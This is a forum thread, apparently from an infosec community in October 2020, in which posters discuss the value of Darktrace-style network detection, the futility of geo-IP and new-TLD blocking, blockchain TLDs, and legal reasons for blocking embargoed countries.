|
Potato Salad posted:like, what threat model does darktrace help address the threat model of your employer not spending enough money on bullshit
|
# ? Oct 6, 2020 21:34 |
|
|
# ? May 23, 2024 15:42 |
|
Potato Salad posted:idk if darktrace helps improve awareness of ongoing modern c&c / exfiltration methods geonetix posted:the threat model of your employer not spending enough money on bullshit Yeah, it's nonsense and I think I may have an opening to kill it off so I'd like to. It claims to watch network traffic and pick out things that look out of place. Anything from "this user logged into this computer, which we think is odd" to "a file that looks like it contains passwords was accessed off this server" to "this device seems to be communicating to a C&C server." I actually don't know if there's an industry term for what it does. Network Traffic Analysis? Network Detection and Response? My main problem with it is that it generates a ton of false alerts and honestly needs someone who spends time with it, but we're not big enough to have someone who just doesn't infosec. It seems even less useful to us than normal with everyone working remotely. We also use Defender ATP, but I guess there is some value in something that monitors the underlying network and doesn't rely on the client/host.
|
# ? Oct 6, 2020 22:34 |
|
I trialed DT and it picked up some (noisy) red team exercise stuff so I dunno, it’s definitely doing something. We were in the middle of redoing our SIEM so I’m not sure if they would have picked it up or not but holy poo poo for the price they charge I kind of want the appliance to not just detect intrusion but dispatch a hired goon to the source geolocation.
some kinda jackal fucked around with this message at 23:55 on Oct 6, 2020 |
# ? Oct 6, 2020 23:52 |
|
Right, that's kinda where I'm at. I know we "got a good deal on it" but it's coming up for renewal and you know how that goes. Right now we need to spend more time on the fundamentals and I am really hoping that I can free up that budget for more down to earth solutions. It's not my money, but we don't have unlimited funds and I'd rather see them go somewhere else.
|
# ? Oct 7, 2020 00:27 |
|
Internet Explorer posted:I actually don't know if there's an industry term for what it does. Network Traffic Analysis? Network Detection and Response? My main problem with it is that it generates a ton of false alerts and honestly needs someone who spends time with it, but we're not big enough to have someone who just doesn't infosec. It’s just some kind of fancy baseline deviation algorithm probably. I don’t know for a fact but I would suspect it would be pretty effective inside a closed, static application environment. Like if you have an environment that runs a customer facing service your baseline traffic and patterns probably deviate a LOT less than an office with human beings and my GUESS is that it would be more on-point there with fewer false positives. Then again, in an environment with a limited subset of expected traffic you could probably piece together something to detect this kind of activity without their price tag. Not saying it’s not difficult but I bet the insights you’d get into an environment and the tools you stand up would be much more valuable as a learning exercise.
|
# ? Oct 7, 2020 00:36 |
|
Isn't DT literally just bayesian filtering for your traffic/logs?
|
# ? Oct 7, 2020 09:45 |
|
DT is not good technology. I’ve seen it used across multiple different environments and the ML models are pure noise. The times that I’ve seen it catch things, it was due to the classic network signatures it has (that any network ids would have). Network sensors in general in this day and age are kind of a waste of money. Unless you have your network setup so it can man in the middle SSL traffic, a network sensor is a literal waste because it can’t inspect the encrypted SSL traffic and more and more malware is using SSL for C2 comms. Spend your money instead on a good cross platform EDR.
|
# ? Oct 7, 2020 14:01 |
|
there are some NDR tools these days that do substantially more than dark trace ever did. I'm still not sold on the concept of NDR, and I think it's just old engineers trying to sell old products to old it managers who work in old companies that are finally looking at trying to take security seriously for the first time in a century edit: not to mention that DT doesn't even R Potato Salad fucked around with this message at 14:28 on Oct 7, 2020 |
# ? Oct 7, 2020 14:19 |
|
heck, Azure Sentinel could be thought of as an upgrade to darktrace, and it's not even trying to compete in that old-timey "these log levels are novel" alert system sector
|
# ? Oct 7, 2020 14:22 |
|
The magical combination of EDR + zscaler + device trust on authentication is fantastic for solving most problems tbh
|
# ? Oct 7, 2020 14:30 |
|
RFC2324 posted:does anyone think remote desktoping in is cool without explicit approval, because it seems like a no brainer that getting caught at it will get you a talking to nowadays Also a lot of methods aggressively advertise themselves and just make it super easy. Chrome Remote Desktop, for example.
|
# ? Oct 7, 2020 17:23 |
|
What's the consensus on blocking based on Geo-IP and things like TLD? My manager blocked everything that wasn't US-based traffic at one point. I've been slowly adding countries back to the list, since because of cloud-based services we were seeing all kinds of denials for legitimate traffic. What's being pushed for now is blocking all of the 'new' TLD's. Basically anything that isn't a com/net/org/edu/mil This is just a headache. Security theatre thanks to some dumb mailing lists he is on. In my mind, those are kind of silly things to rely upon. Sure, you get some protection from random Chinese/Russian botnets, and we don't have any customers that aren't in the USA, but it's not scalable and hard to manage. Bob Morales fucked around with this message at 18:19 on Oct 7, 2020 |
# ? Oct 7, 2020 18:17 |
|
Also, is https://security.stackexchange.com/ worth adding to the OP?
|
# ? Oct 7, 2020 18:18 |
|
Blocking tld’s is dumb We block Russia and China, but I don’t think it actually accomplishes anything except maybe reducing the noise a little There is still plenty of malicious traffic coming from places you can’t block
|
# ? Oct 7, 2020 18:21 |
|
The Fool posted:Blocking tld’s is dumb Most of the poo poo like a driveby on some website or CNC poo poo for a downloaded/phished bot is just as likely to be based in a compromised system that passes the whitelist anyway so...
|
# ? Oct 7, 2020 18:25 |
|
Bob Morales posted:What's the consensus on blocking based on Geo-IP and things like TLD? The result is log reduction and absolutely nothing more. There is a huge amount of small ISPs (usually rural or WISP startups) that are leasing dirty IP space from CN/RU/whatever. Consider also dropping all of SC/ZA while you're at it. There are multiple /8s in aggregate that were stolen and hijacked and are being used daily for abuse. Also, you can just buy a US proxy for a cent a day, so really it's just log reduction.
|
# ? Oct 7, 2020 18:39 |
|
Okay, so I'm not off-base when I recommend not doing these. I'll probably be forced to anyway. The .bazar domain has been linked to the Bazar malware so OMG Here's the email that was forwarded to me, from a mailing list: Some dildo that probably makes double what I make posted:MAILING LIST, Some other dildo posted:YMMV, but this is the list that we’ve been blocking for a while now.
|
# ? Oct 7, 2020 18:52 |
|
.men but not .women? Wait till the MRA people hear this one
|
# ? Oct 7, 2020 18:56 |
|
lol at that list
|
# ? Oct 7, 2020 19:00 |
|
They block .nu? Like half of Swedish web pages are .nu, because it means now in Swedish. Famous scammer country.
|
# ? Oct 7, 2020 19:02 |
|
I'm the trailing / showing a block of websites, not actually blocking ips
|
# ? Oct 7, 2020 19:05 |
|
My personal domain and email address is on xyz lol
|
# ? Oct 7, 2020 19:07 |
|
quote:If you have technology that can block encoded powershell commands, powershell from downloading scripts or files from the internet, etc..* it can stop the early phases of Trickbot/Emotet and other malware.
|
# ? Oct 7, 2020 19:16 |
|
I have a .co domain so every exchange if my email address has to include the discussion 'not dot UK?'
|
# ? Oct 7, 2020 19:27 |
|
Bob Morales posted:The .bazar domain has been linked to the Bazar malware so OMG This is a blockchain TLD, it isn't even publicly resolvable on the internet
|
# ? Oct 7, 2020 19:29 |
|
Biowarfare posted:blockchain TLD boy, I didn't need to know that that was even a thing, at all
|
# ? Oct 7, 2020 19:33 |
|
Subjunctive posted:boy, I didn't need to know that that was even a thing, at all this is the new https://en.wikipedia.org/wiki/New.net (you might as well block .onion while youre at it)
|
# ? Oct 7, 2020 19:33 |
|
Biowarfare posted:this is the new https://en.wikipedia.org/wiki/New.net that's definitely something that didn't need a remake
|
# ? Oct 7, 2020 19:35 |
|
Biowarfare posted:This is a blockchain TLD, it isn't even publicly resolvable on the internet https://emercoin.com/en/documentation/blockchain-services/emerdns/emerdns-introduction
|
# ? Oct 7, 2020 19:43 |
|
yeah if you're curious there's a handful of alternative dns roots of sorts the biggest network of separate resolvers is opennic https://en.wikipedia.org/wiki/OpenNIC#Peering_agreements IIRC, other than for .onion, most malware don't bother running their own software (like actual blockchain clients), most of them just try to resolve against a random public resolver instead of the local system resolver Impotence fucked around with this message at 19:46 on Oct 7, 2020 |
# ? Oct 7, 2020 19:43 |
|
It's unreasonable to do geo-ip blocking but you should definitely consume as many good threat intel feeds as you can, and pull them into automatic blacklists.
|
# ? Oct 8, 2020 11:41 |
|
I haven't done this in a while, what's the easiest way to break cert pinning on a Win32 application? file magic says PE32 executable (GUI) Intel 80386, for MS Windows; as far as I know it ships with embedded OpenSSL and a bunch of CA certificates embedded into the exe. edit: I'm going to hex editing a DER into one of the replacements and see what happens, lol Impotence fucked around with this message at 13:20 on Oct 9, 2020 |
# ? Oct 9, 2020 13:17 |
|
It's very likely you're legally compelled to block traffic from embargoed countries. Geoip blocking is useless for actually preventing attacks from those countries, but does fulfill your legal obligation* *In my experience, that is. I am not a lawyer, this is not legal advice
|
# ? Oct 9, 2020 15:29 |
|
Achmed Jones posted:It's very likely you're legally compelled to block traffic from embargoed countries. Geoip blocking is useless for actually preventing attacks from those countries, but does fulfill your legal obligation* that just sounds dumb on its face random ip traffic is not the same as doing business with
|
# ? Oct 9, 2020 15:37 |
|
The Fool posted:that just sounds dumb on its face Usually, for legal purposes, you just need to be able to point at a thing and say "see? An attempt was made!" And your liability is covered
|
# ? Oct 9, 2020 15:41 |
|
What, stupid legal interpretations of tech poo poo? Well I never Context also matters. Infosec person at a large legal firm vs a saas shop vs an ad network vs netflix
|
# ? Oct 9, 2020 15:41 |
|
RFC2324 posted:Usually, for legal purposes, you just need to be able to point at a thing and say "see? An attempt was made!" And your liability is covered This is exactly how it was explained to me at oldjob lol
|
# ? Oct 9, 2020 15:42 |
|
The Fool posted:that just sounds dumb on its face Good luck explaining the difference to an 80 year old judge with syphilis and covid
|
# ? Oct 9, 2020 15:43 |
|
If you need to follow ITAR or something, it's absolutely something that you'll need to do. Pretty much for the reasons stated above.
|
# ? Oct 9, 2020 15:45 |
|
|
# ? May 23, 2024 15:42 |
|
xtal posted:Good luck explaining the difference to an 80 year old judge with syphilis and covid Are we talking about the Google/Oracle API Copyright case now
|
# ? Oct 9, 2020 15:48 |